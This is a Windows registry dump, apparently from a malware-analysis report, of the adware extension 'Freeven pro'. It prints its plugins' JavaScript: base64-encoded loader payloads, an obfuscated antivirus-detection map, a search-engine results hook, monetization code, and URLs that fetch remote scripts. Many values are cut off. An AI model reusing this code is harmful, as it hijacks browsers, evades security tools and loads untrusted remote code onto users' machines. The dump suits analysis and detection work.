"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGI3MDdiNTQwZDAwMTYxZjNkMWYxYzU4NDg1NjQ3MWMxNjFiMTg1NzVmNTUwNTA1NGIwNDEwMDYwYjA4MTQxZjA2MTMwNjAwNGMwYzA3MDA1ZjA5NWQwNjAxMWUxMTVhNWI1YjQyNGIxMzQ2NTM0NTU1MGI1YjA5NWUxMDAxNDkxNjFkMDY1MjM3MzIzMzI4M2QyNTM2MjYyYjJiMmQzZjJmM2YyYTIyMjAzYTI2MmEyYzMyMjMyZjMwMjkyYzMwM2QzMDRlMGMwMDBhMWMxNzA4MTE1ZjMwMzcyZTIyMzUyMTI1MzczZDI2MmEzYTMyMzEyYTIyMjkyYjM1MmYyYTM3MzI1MjU2Nzg3ZjQ3MWMxNjFiMTgxZTI1MDgxZTU0NWY1NDQwMDcxYzE5MDAwOTQ4NTk0YTAzMTE0MTE4MWYxOTE5MTcxMjAwMDAwNzBjMWM0MzEzMTUxZjU5MTY1YjEyMGIwMjFlNDU0OTQ0NDQ1NDE1NTI1OTU5NWExNDQ5MTY1ODBmMDc1ZDFjMDEwOTRkMjUyZDM1MzczYjMxM2MzYTI0MzQzZjIwMjkyMDJjMzYyYTI2MjkzNTNlMmQyNTMwMzYzZDI2MmMzMjJmNWMxMzA2MTUxYTAzMDIwZDUwMmYyNTMxMjQyYTI3MzEzZDIxMjkzNTI4MmQzNzM1MjQzZDIxMjkyMDM1MjUyZDU0NDk3ZTZiNGQxODAxMDUxZDFiMTgyYzEwNDA1NTQ4NWY0NjRhNzgwYg==', 'pzrvetbohm'); }"

[HKCU\Software\Freeven pro\Plugins\375]
"Version" = "1"

[HKCU\Software\Freeven pro\Plugins\376]
"JavaScript" = "(function(){var a=(function(){var l=function(){return appAPI&&appAPI.installer&&appAPI.utils.isFunction(appAPI.installer.getAdditionalInfo)?appAPI.installer.getAdditionalInfo():null;};var j={ie:10,ni:11,te:19,ch:20,to:26,sb:27,op:28,tc:29,ff:30,tf:39,sf:40,nv:50,ms:51,mf:52,mc:53,np:54,sm:55,fm:56,cm:57,mx:60};var p=source_id;var k=776;var e=__PageActive__;var q=new Date(2013,0,1);var f=1000*60*2;var n=1000*60*10;var o=(appAPI&&appAPI.installer&&typeof appAPI.installer.getUnixTime===function)?appAPI.installer.getUnixTime()*1000:((new Date(2013,0,1)).getTime());var h=l;var g=[{pluginId:288,httpUrl:http://istatic.datafastguru.info/fo/min/crqc.js?hid=__CROSSRIDER_USER_ID__&bname=__CROSSRIDER_APP_NAME__&subid=__CROSSRIDER_EXTENDED_SUB_ID__,delay:0},{pluginId:242,httpUrl:http://inst.shoppingate.info/js/sg_bg.js?AFFILIATE_ID=crsrdr&SUB_DISTRIBUTER_ID=__CROSSRIDER_EXTENDED_SUB_ID__&BRAND_DISPLAY_NAME=__CROSSRIDER_APP_NAME__,httpsUrl:https://inst.shoppingate.info/je6"

[HKCU\Software\Freeven pro\Plugins\2]
"Version" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Freeven pro\Installer]
"osName" = "XP32"

[HKCU\Software\Freeven pro\Code]
"BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Freeven pro\Plugins\35]
"Name" = "IEAjax"

[HKCU\Software\Freeven pro\Manifest]
"UninstallerOfferAction" = "NA"

[HKCU\Software\Freeven pro\Plugins\195]
"Name" = "icm_convertmedia_m"

[HKCU\Software\Freeven pro\Plugins\36]
"Version" = "8"

[HKCU\Software\Freeven pro\Plugins\4]
"Version" = "5"

[HKCU\Software\Freeven pro\Plugins\44]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)<0?0:(window.screenTop-20)6"

[HKCU\Software\Freeven pro\Plugins\200]
"Version" = "4"

[HKCU\Software\Freeven pro\Plugins\94]
"Name" = "IEPopup"

[HKCU\Software\Freeven pro\Plugins\281]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/281.js"

[HKCU\Software\Freeven pro\Plugins\221]
"Name" = "icm_downloads_m"

[HKCU\Software\Freeven pro\Manifest]
"BgVersion" = "1"

[HKCU\Software\Freeven pro\Plugins\184]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/184.js"

[HKCU\Software\Freeven pro\Plugins\221]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"

[HKCU\Software\Freeven pro\Plugins\36]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/36.js"

[HKCU\Software\Freeven pro\Plugins\376]
"Name" = "loaderBackup"

[HKCU\Software\Freeven pro\Plugins\47]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/47.js"

[HKCU\Software\Freeven pro\Plugins\37]
"Version" = "6"

[HKCU\Software\Freeven pro\Plugins\42]
"JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;}6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Freeven pro\Plugins\39]
"Name" = "IEDatabase"

[HKCU\Software\Freeven pro\Plugins\43]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to pars6"

[HKCU\Software\Freeven pro\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3"

[HKCU\Software\Freeven pro\Plugins\42]
"Version" = "10"

[HKCU\Software\Freeven pro\Plugins\288]
"Version" = "4"

[HKCU\Software\Freeven pro\Plugins\193]
"Name" = "revizer_p_dynamic_b2b_m"

[HKCU\Software\Freeven pro\Plugins\41]
"Version" = "7"

[HKCU\Software\Freeven pro\Plugins\390]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/390.js"

[HKCU\Software\Freeven pro\Plugins\220]
"JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(f){var i=(function(){var z={\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1,\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2,\x61\x76\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64:4,\x6D\x73\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:8,\x65\x73\x65\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:16,\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\x74\x65\x64:32,\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:64,\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:128,\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65\x63\x74\x65\x64:256,\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:512,\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1024,\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2048,\x62\x61\x69\x64\x75\x61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64:N6"

[HKCU\Software\Freeven pro\Plugins\9]
"Name" = "search_engine_hook"

[HKCU\Software\Freeven pro\Plugins\288]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWU2NzVhNWE1NDQ1NTMxYjE5MTcxNTM4MDgxNjU2NWY1MTUxMDUxNzExMWQ0MDU1NWIwYzAyMDcwYzE3MGMwZTU0MWYwNzBkMWUwMzBlMGMwODFkNTQxOTFiMDg1ZTE1MDI0YzA4MDQxNDU1MTcxNzAwMTA0MzA5MTY1MjEyMTMxMDU4MmUyYzJlMzEyYTNlMjkyODNkMjEzNDIxMzIzNjM2MjgyODI1M2QyMTJlMmM0YjAxMGIwYzE3MWY0OTNhMmUzMDNmMmMzNjNlMjgzMzMwMjAyMzJjMmMzMzM1MzIzNDNiMzkyMDJlMmM0YjEwMTAwZjEzMWU0OTNhMmUzMDNmMmMzNjNlMjgzMzMwMjAyMzJjMjgzYjMxMjgzNDNlMzEyMTJlMjAzODIxM2EyNDNlMjUyYjQ3NWQ3OTRkNDM0NTRkNTgxMjAwMTEwMTAwMzgxMTA5NGY0MDVhNTYwZDA1MDcxZDEwNWY0MjU1MTMwNzExMTAwNzA0MDA0YjA4MDkxMjFiMTUxMjFjMDAxMzRiMGUxNTE3NWIwMzFlNWMwMDBhMGI0MjE5MDgwNTA2NWYxOTFlNWMwZDA0MWU0NzJiM2EzMjIxMjIzMDM2M2YzMzNlMzEzNzJlMjYzZTI2MzczMjMzM2UyYjNhNTcxMTAzMDIwODA4NDcyNTJiMjYyMzNjM2UzMDM3MjQzZTNmMjYzYTMwMjMzZDNjMmIyYzM3M2YyYjNhNTcwMDE4MDEwYzA5NDcyNTJiMjYyMzNjM2UzMDM3MjQzZTNmMjYzYTM0MmIzOTI2MmIyOTNmM2UyYjM2MjQzMTMyMmEyMTMyMjU1ODU4NmY1MTUzNGQ0MzQ3MWQxNjBmMTMwYzFmM2EwOTQxNWY0ZDQ4NDI0YzZmMGM=', 'emzzteqsmc'); }"

[HKCU\Software\Freeven pro\Plugins\46]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/46.js"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 A1 8E 10 A3 B2 48 6C 74 29 09 40 DD 97 B9 4E"

[HKCU\Software\Freeven pro\Plugins\2]
"Name" = "ie8_fix_1"

[HKCU\Software\Freeven pro\Plugins\195]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/195.js"

[HKCU\Software\Freeven pro\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,47,345,354,253,102,180,184,193,220,195,200,221,223,226,230,233,242,260,273,281,288,334,375,380,390,391,91,376"

[HKCU\Software\Freeven pro\Plugins\242]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ3ZjZjNTYwYzFlMWExZDMzMTEwYTU3NWY1NDQ2MDIxYTE5MTY1OTQ5NWEwYzFhMTcxZTQwMWUwZTBjMTYwNTBjMWEwMzBiMWEwODQ4MGEwODEzMGE1YjBlMTk0MTFlMDEzYzA0MTI0YjFlMTc1NTJmMmIyMDJhMmEzYzI0MjAyMTM1MjcyOTViMDAxNDA2MTcxMDE2NGMzZDM4MjQzYzIyM2MzNjIwMzYyMzJjMzgzMjI2MzQyYTJjMzA1OTM1MzEyZTM0MmMzNTI2MzczZDIwMmYzYzMyMjMzYjMyMzAyYjMwMjEyZTMxM2UzMzIxMzkzYzIxMmIzYjRjMmMzZjI3MmQyMjJhMjEzZDM3M2EyMjJjM2YzYzI4MzQyODMxNTkzNTMxMmUzNDJjMzUyNjM3M2QyMDJmM2MzMjI3MzMzNjJhMmIzNTI5MmYzMTMyNDQ0ZjZjN2M0NzFjMTAxZTFlMWUzMzExMGE1NzVmNTQ0NjAyMWExOTE2MTA1YzVhNGExZDBhMTkxYTQzMTUwYjA5MDUxNTFkMGEwZDBmMTkwMzRkMGYxYjAzMWI0YjAwMWQ0MjE1MDQzOTE3MDI1YTBlMTk1MTJjMjAyNTJmMzkyYzM1MzAyZjMxMjQyMjVlMDUwNzE2MDYwMDE4NDgzZTMzMjEzOTMxMmMyNzMwMzgyNzJmMzMzNzIzMjczYTNkMjA1NzMxMzIyNTMxMjkyNjM2MjYyZDJlMmIzZjM5MjYzZTIxMjAzYTIwMmYyYTMyMzUzNjI0MmEyYzMwM2IzNTQ4MmYzNDIyMjgzMTNhMzAyZDM5M2UyMTI3M2EzOTNiMjQzOTIxNTczMTMyMjUzMTI5MjYzNjI2MmQyZTJiM2YzOTIyMzYyNTNhM2EyNTI3MmIzMjM5NDE0YTdmNmM1NjE0MDYxYjBhMGYwZDJmMTE0NzRlNDQ1ODVhNWY2YzFl', 'fuetdjnmfc'); }"

[HKCU\Software\Freeven pro\Plugins\354]
"JavaScript" = "__CTG_MAPPING__={""1"":[""d908e50170d7cb46a92fdbff0d73bb5d""

[HKCU\Software\Freeven pro\Plugins\39]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""

[HKCU\Software\Freeven pro\Plugins\184]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDI2YjcwNTgwZTE4MDQxNzJjMWQxNTQzNDM1YTQ0MDQwNDEzMDk1NTU2NGUxNzBhMTU0MjAwMDYwYTFiMTgwZDFjMWIwMjFmNWUwNDE2MDI1NjBmMDkwOTA0NDMxYzA4MWUwNjFhNGYxMzA5NTkyMzAyMGUxZTA2MTcyODFkNDcyMzU0MzE1MzM4NWQ0YTIwNTQzODU2NWY0NDRhM2M1ZDQ4NTA1NDNiNWYyZDQwNGE0OTVmNDg1NDQ4NGQyMjVkNDAyMTRmMmE1ZjMyMTAwZTAzMjUxNDVhMmEwZTE1MDQwYTVjMzYwZDAyMTMxNzBhMGIyODNkNDc1NDVjNDA1NzQ5NDkyOTEzMTYxZTEzMGYwNDI5MTgwMjFjNWMyNjI1MjUzZTNmMzQyYTNkMzAyNTNjMjgzOTJkMjAzNzI2MjEzODJjM2MyNTM5NGEyNDA4MTYwMzFiMDAwYjMzMDI1MTJmMzgzYTNkMzYzMjJhMjgyZjI4MzUzNTI2MmEyMTM1M2MzNDIyMjkzNDM4MmEzYTNiM2UzMDNlMzkzMzUyNGI3MzY2NWIwOTBkMGUxNjFmMjUxNTE1NGQ0MzQxNWIxMjEyMTgwMDE0NDM0MDU2MGYwOTA5NDgxYzExMTQwZDBlMTUwNDE4MWUxNTQyMTMwODE0NDAxNzExMGExODQ5MDAxZjAwMTAwYzU3MGIwYTQ1MjkxZTE5MDAxMDAxMzAwNTQ0M2Y1ZTJkNDQyNjRiNWMzODRjM2I0YTU1NTg1ZDIyNGI1ZTQ4NGMzODQzMjc1YzVkNTc0OTVlNGM1MDRlM2U1NzVjMzY1MTNjNDkyYTA4MGQxZjJmMDg0ZDM0MTgwMzFjMTI1ZjJhMDcxZTA0MDkxYzFkMzAyNTQ0NDg1NjVjNDA1NzVmM2YwYjBlMWQwZjA1MTgzZTA2MTQwYTQ0M2UyNjM5MzQyMzIzMzQyYjI2M2QyNDJiMjUyNzNjMjAzd6"

[HKCU\Software\Freeven pro\Plugins\193]
"Version" = "9"

[HKCU\Software\Freeven pro\Plugins\273]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWE3ZTUxNDI0YzRiNGQwYzEyMDAxMTIxMDMwZTRlNTE0ZjQ2MGUwMDE1MDQ0YjRkNDMwODA1MTc0ODE4MDgxYTFhMDAwMzA3MDYwNzQ4MTcwZTE5NWUxMTBmMDExYzRiMDUxZTEyNWIxMjE2MTQwMTFjNGEwYzA3NWUxNTE3MDQzMzAyMGI1OTU3NDU1NTQxNTcxMTE5MDkwZTAyMDAyYjA4MTA0YzNkMzMyODNkMmIzNTI3MzMzZDM1MjczZTM0MmEzYzMyMzEyZjMwMzQyNjMzMzgzYTI2MzkzZDI1MmIyZTQ0MWYwOTFkMDUwODEwNWMyYjJlMjEzZTI0M2MzNzM0M2QyNTMxMjMzZDJkM2IzZjNiMjgzNTJjMzEyZTNkNGU0NzY1NDQ0NjU0NDE1NjE5MTYxODFiMWMzMTE0MTg0MzRlNTE0MDA0MWYxYjE0MTU0ZTRlNWIxMjA4MWY0NTAzMGQwODFmMDMxYjFkMGIwZjQ1MGMwYjBiNWIxMjE3MWIxMTQzMDgwNTE3NDkxNzE1MGMxYjExNDIwMTFjNWIwNzEyMDcyYjE4MDY1MTVhNWU1MDUzNTIxMjAxMTMwMzBhMGQzMDBkMDI0OTNlMmIzMjMwMjMzODNjMzYyZjMwMjQyNjJlMjczNDNmMmEyYTIyMzEyNTJiMjIzNzJlMzQyNjIwMzkyYjQ3MDcxMzEwMGQwNTBiNTkzOTJiMjIyNjNlMzEzZjM5MjYyMDIzMjYzZTM1MjEzMjMzMjUyZTI5MjMyYjNlNTY1ZDY4NGM0YjRmNDQ0NDA0MGQwMTE2MGIwMjIyMGI0NjVjNTQ1MzQzNDI2ODEx', 'atqblkodft'); }"

[HKCU\Software\Freeven pro\Plugins\391]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/391.js"

[HKCU\Software\Freeven pro\Plugins\260]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/260.js"

[HKCU\Software\Freeven pro\Plugins\200]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTc2NjY1NGQxODEyMTcwNjMzMDAwMDRlNTY0ZjUyMGUxNzAyMTY0ODQzNDMxZTFhMWMwMzEwNTgwMDFkMTQxNTA4MGExMTBhNGQxNTA5MWY0MzFhNWQ0MTQwNDkxNDFlMGYwNjA5MDAwNTFjMDQ0OTUyNDY1MTQyNDMzMzMzMmMyMjI5MzAyNTM0M2IyODI5M2UzMDM1M2UzNzMzMjgzNjI5MjgzMzNjMjUyNDNjM2YyMjJkMzM1MzFjMGUwMjEyMGQxMzE0M2MwZDAxMDk1MjJmMzkyMDI0MjkyMTNmM2UyNTJiMzUzNDNjMzczNjIyMzMyMjJkMjIzNTM5M2M1NDRhNzg2NTRlMDQxYjA0MTYxMDIzMTQxZTRlNTY0YzRkMTgxMjE3MDYxNTQ4NDM0MzFlMWExYzAzMTA1ODAwMWQxNDE1MDgwYTExMGE0ZDE1MDkxZjQzMWE1ZDQxNDA0OTE0MWUwZjA2MDkwMDA1MWMwNDQ5NTI0NjUxNDI0MzMzMzMyYzIyMjkzMDI1MzQzYjI4MjkzZTMwMzUzZTM3MzMyODM2MjkyODMzM2MyNTI0M2MzZjIyMmQzMzUzMWMwZTAyMTIwZDEzMTQzYzBkMDEwOTUyMmYzOTIwMjQyOTIxM2YzZTI1MmIzNTM0M2MzNzM2MjIzMzIyMmQyMjM1MzkzYzU0NGE3ODY1NGUxYzAzMDUwMTBhMTgyZjE2NGU1NjRjNWQ0MDU2NjkwYg==', 'lllopfcvfr'); }"

[HKCU\Software\Freeven pro\Plugins\102]
"Version" = "15"

[HKCU\Software\Freeven pro\Plugins\334]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/334.js"

[HKCU\Software\Freeven pro\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,47,94"

[HKCU\Software\Freeven pro\Plugins\246]
"Name" = "setup"

[HKCU\Software\Freeven pro\Plugins\230]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/230.js"

[HKCU\Software\Freeven pro\Plugins\94]
"JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.se6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Freeven pro\Plugins\253]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGU2MDdmNDgwNTEyMTUxYjM0MTgxOTQ4NGM0YTRmMzkzZTI4MzMzNTIwM2EzMjJiMzkyMzNlMjMyZTM5MjEzNTI5NDUwZjBmNGUwYTRmMDAwNjQ4NWE2MDY0NDQxMTA3MTQwZDFjMDQzZjBlNGY1YzQxNTk1NDU5NTk2MDdmNDgwNDA4MGQwMjBmMGYzZjM5NTQ1MDRkNDQxNjAyMGYwZTFhMWQ1ODM1MzIwNDA4MzQxMTAzMGQwZjFhMzUxODE0MGQzNDNlNGE0ODRhNTEzNTMyMjUzMzM0MzIzZTM0M2UyNTM1MjUyOTMyM2YzZTM1NWEwODFmNDQwYTBmMDc1NDAyMGIxODFhMTcwMzBhMDg1YzM0M2UyOTI3MjUyNTM5M2YyZjI1MmUzMzM1MzYyYjNiM2EzMjJmMjUzNDNlNGMxNzE4MTkxZDFlMDMxMzU2M2UzNTM2MzgzOTM5M2UzNDI4MmYyNDM4MmEyODI0MjUzYTM1MjQzOTNlMzU1MzA4MWYwOTUwMzkzZTI4MzMyNTI2MzkyNDIzMjkyMzMzMzQzNDM5MzAzODI5MjMyOTM5M2U0ZDEzMDQxMTU3NTE0YTQ2NDY0OTA1MDQxZDU1MmUxNzFlMDg0ZTQ4NDI0ZjBkMTAxZTIyMDMwMDAzNDk0MjVhNDg3ZjE3', 'ujvjmfakaj'); }"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Freeven pro\Manifest]
"ThanksUrl" = "NA"
"PublisherId" = "21636"

[HKCU\Software\Freeven pro\Plugins\334]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTk2OTRhNTc1OTRjNTYwYzE3MWYxMjM2MTgxYjViNTY1NDQ2MGIxZjE2MTM1MDU4NTYwOTBjMTA1MjQ1MTUwNjA4MDQxNjAwMTkwYjBkNDUwMTBjMDc1ODBlMWYyYjBiMDEwZDNkNWE1OTQ2MTM1NDJiNGEwOTE4NWQwMDBiMWEwOTBkMWQwMzBkMjIwNjVlMzUyODNhM2UzYjM3MzAzOTJiMjcyZjI1MjYyZjM1MjkzMzM0MmIyNzM1Mjg1ZjBmMWIxMTBkMWYxMDFhMjkxODFkMDk0OTNiM2MyODMwMmMzOTI0MmIyNTMwMjEzMTM0MjEyYzNmMzkyZDNlMmQzYjIwMjQyNjI2MzUyODVmMDUxYTE3MTcwYTBlMGYwYjAzMTAwMzFhMzAwYTA2MDc1ZTM1MjgzYTNlM2IzNzMwMzkyYjI3MmYyNTI2MjUzYTM3MzcyYTJlMmYzNTIzMzAyMTMxM2IzYzRkMDMxMzFhM2UzZDUxMmIzYjIwMzkyZDMwMzkyNTMwMjgzMTM2M2MyYTMyMzMzNTNlM2QzMzJiNDIyYTI5MmIyMDU3MjgyNjJmMjYyYjMwMzgzMDJhMmUzMjJiMzMzZDJhMzAzZjIzMmYyNjMyMmIzMzIxMzcyNjM5M2QyYTJlMjgyNjRhMTUxNDEzMjUwMzBlMGY0YTI2MzMzNzM2MmMzODMxMzEyMzMzM2MzZTJiMjUzMzNiM2QyZDJiM2EzYzMzMmI0MjEwMWUwMDJhMmU0YTI2MzMzNzM2MmMzODMxMzEyMzMzM2MzZTJiMjEzYjNmMjcyZDJlMzIzZDMzMjczMTIxMzQyYjI3MzUyODViNDA3ZTQ0NDM0YjQyNDExYTFiMGMwYjFkMGEyYTBmNDA1OTRhNDQ0YTU4N2UxOQ==', 'bcjwyltdck'); }"

[HKCU\Software\Freeven pro\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'

'});this.addEngine({name:bing,url:bing.com,input:input[name=q],results:#results > ul,result:'

'});this.addEngine({name:yandex,url:yandex.ru,input:form.b-head-search input.b-form-input__input,form.b-search input.b-form-input__input,results:.b-body-items > ol,result:'

'});this.addEngine({name:yandex,url:yandex.com,input:form.b-search input.b-form-input__input,#searchInput,results:.b-serp2-list__portion,result:'

'});this.addEngine({name:yahoo,url:yahoo.com,input:input[name=p],results:#web ol:eq(0),result:

});this.addEngine({name:yahoo,url:search.yahoo.com,input:input[name=p],results:#web ol:eq(0),result:

});this.addEngine({name:ask,url:M6"

[HKCU\Software\Freeven pro\Plugins\246]
"JavaScript" = "var _0x8f59=[""10""

[HKCU\Software\Freeven pro\Plugins\17]
"Name" = "jQuery"

[HKCU\Software\Freeven pro\Plugins\38]
"Name" = "IECallbacks"

[HKCU\Software\Freeven pro\Plugins\37]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100)};appAPI.openURL(a);}});appAPI.internal.callbacks.setEventHandler(runHelper,function(b){if(appAPI.isActiveTab()){var a=b;appA6"

[HKCU\Software\Freeven pro\Manifest]
"AddressbarURL" = "NA"

[HKCU\Software\Freeven pro\Plugins\345]
"Version" = "13"

[HKCU\Software\Freeven pro\Plugins\14]
